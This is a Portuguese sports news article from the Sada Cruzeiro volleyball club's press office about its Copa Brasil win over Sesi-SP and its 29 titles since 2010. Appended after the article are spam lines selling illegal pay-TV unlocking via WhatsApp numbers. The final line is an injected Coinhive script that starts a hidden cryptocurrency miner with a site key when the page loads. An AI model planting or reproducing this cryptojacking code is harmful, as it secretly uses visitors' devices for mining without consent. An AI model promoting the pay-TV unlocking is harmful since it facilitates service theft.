Fotos: Willian Lucas-Inovafoto-CBV
Da Assessoria do Sada Cruzeiro Vôlei
Os resultados conquistados pelo Sada Cruzeiro nos últimos anos já passam por uma criteriosa lista, pois, de cabeça, fica difícil alguém se lembrar de tantos títulos. A taça da Copa Brasil, levantada pelo elenco azul neste sábado, 27/01, na vitória por 3 a 2 contra o Sesi-SP, foi exatamente o 29° troféu, desde 2010. São números incríveis, de um time que faz história no vôlei brasileiro e mundial.
O líbero Serginho, que esteve em todas essas conquistas, falou sobre as marcas alcançadas. “São muitos anos e a gente continua com sangue nos olhos. Hoje o Sesi valorizou bastante a nossa vitória, é um adversário direto nesses anos de sucesso do Sada Cruzeiro. E o mais importante é que a renovação existe, a gente consegue colocar peças da base ano a ano no elenco, mas há pessoas no grupo que fazem parte do clube, estão enraizadas aqui, mas se reinventam a cada jogo, a cada dia. Isso é o mais importante, porque são oito anos, os outros times têm muito material da gente para nos marcar, mas na hora de decidir a vontade de vencer, independente dos 29 títulos já conquistados, é o que prevalece”, comentou o líbero multicampeão.
Os números garantidos pelo time estrelado realmente impressionam, até mesmo os matemáticos. De um total de 37 campeonatos disputados, desde 2010, o Sada Cruzeiro garantiu presença em 33 finais e levantou um total de 29 títulos. É como se em qualquer torneio que o elenco cruzeirense jogasse, a chance de conquistar um título fosse de 78,4%. E garantindo classificação em uma final, a probabilidade de o Sada Cruzeiro sair campeão seria de 87,5%. São resultados fantásticos, considerando que nesses números estão torneios como o Mundial de Clubes (3 títulos), Superliga (5), Sul-Americano (4), Supercopa (3) e agora o tricampeonato da Copa Brasil.
“Acho que este título serve para nos dar ainda mais confiança, saber que crescemos durante o jogo, e que vamos seguir evoluindo e nos preparando para chegar muito bem no Sul-Americano e nos playoffs da Superliga. A nossa missão principal nesse torneio foi melhorar o nosso nível de jogo e nós evoluimos muito. Hoje jogamos em alto nível e o Sesi também, mas nos momentos que valiam, nosso time cresceu ainda mais e foi superior. Fizemos um tie-break fantástico no saque, bloqueio e principalmente no nosso ataque, que teve 87% de aproveitamento no set. Foi excelente”, avaliou o comandante Marcelo Mendez, em seu nono ano à frente do Sada Cruzeiro.
VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345
Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça
liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>